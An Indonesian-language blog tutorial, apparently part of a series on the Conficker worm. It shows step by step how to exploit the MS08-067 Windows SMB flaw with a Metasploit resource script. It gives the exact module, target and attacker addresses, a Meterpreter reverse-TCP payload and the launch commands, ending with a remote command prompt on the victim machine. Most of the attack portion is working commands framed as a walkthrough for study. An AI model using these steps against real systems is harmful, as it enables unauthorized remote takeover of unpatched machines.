Tidak lama setelah vulnerability MS08-67 dipublikasikan, HD Moore segera menulis dan mengintegrasikannya pada Metasploit. Metasploit adalah sebuah framework untuk melakukan security testing. Adapun script lengkap dari exploit tersebut juga dapat dilihat dalam bahasa python pada link Exploit MS08_67 dari www.securityfocus.com.
Pada artikel ini, kita akan melakukan exploit menggunakan metasploit framework, khususnya dengan menggunakan Resources Script. Menurut HD Moore, resources script merupakan batch file yang digunakan di Metasploit Framework untuk melakukan otomasi perintah. Berikut ini adalah langkah-langkah yang kita lakukan ketika membuat resources script:
- Memakai exploit bagi MS08_67, yaitu: use exploit/windows/smb/ms08_067_netapi
- Menetapkan target, yaitu: set RHOST 172.16.123.251
- Menetapkan payload, yaitu: set PAYLOAD windows/meterpreter/reverse_tcp
- Menetapkan localhost dari attacker, yaitu: set LHOST 172.16.123.252
- Menetapkan port yang digunakan pada attacker, yaitu: set LPORT 7777
- Mengeksekusi seluruh perintah, yaitu: exploit -j -z
Gambar berikut ini menjelaskan langkah-langkah yang kita lakukan:
Adapun isi script conficker.rc secara utuh adalah:
Selanjutnya setelah resources file tersebut selesai kita buat. Maka kita mengeksekusi script tersebut dengan perintah msfconsole -r <resources script>. Script akan berjalan dan melakukan Remote Code Execution hingga kita mendapatkan command prompt dari mesin target sebagaimana gambar berikut:
Dari mesin attacker, kita dapat menjalankan remote acces sebagaimana gambar berikut ini:
Apabila serangan dilakukan hanya untuk satu sasaran mungkin tidak bermasalah. Namun, untuk melakukan serangan bersifat massal tentu cara ini tidak efisien. Artikel berikut ini akan membahas bagaimana conficker melakukan serangan massal terhadap banyak mesin.
Adapun link terkait dengan artikel ini adalah:
<01> 0x0 Conficker Story
<02> 0x1 Target Selection
Py-Sec[dot]org 